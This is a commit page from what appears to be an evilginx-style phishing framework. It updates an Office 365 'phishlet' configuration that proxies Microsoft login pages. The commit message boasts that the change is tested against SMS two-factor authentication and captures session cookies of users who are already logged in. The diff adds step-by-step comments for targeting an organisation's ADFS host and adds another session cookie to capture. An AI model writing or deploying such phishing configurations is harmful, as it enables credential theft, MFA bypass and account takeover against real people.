Update o365.yaml

Added instructions to fill in the placeholders for ADFS. Fixed & tested the code with text message based 2FA. If a user already logged in and visits, his cookies get correctly captured as well without username/password. `Redirect_url` immediately works now.
code4security · Feb 10, 2019 · 0ff67cb · 0ff67cb
1 parent 4cbff63
commit 0ff67cb
Showing 1 changed file with 9 additions and 0 deletions.
diff --git a/phishlets/o365.yaml b/phishlets/o365.yaml
@@ -4,6 +4,13 @@ min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
+  # The ones below are needed if your target organization utilizes ADFS.
+  # If they do not, you can comment out all lines that contain <...>
+  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
+  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
+  #    <insert-adfs-subdomain> = adfs
+  #    <insert-adfs-host> = example.com
+  #    <insert-adfs-subdomain-and-host> = adfs.example.com
   - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
   - {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
 sub_filters:
@@ -13,6 +20,8 @@ sub_filters:
 auth_tokens:
   - domain: '.login.microsoftonline.com'
     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
+  - domain: 'login.microsoftonline.com'
+    keys: ['SignInStateCookie']
 credentials:
   username:
     key: '(login|UserName)'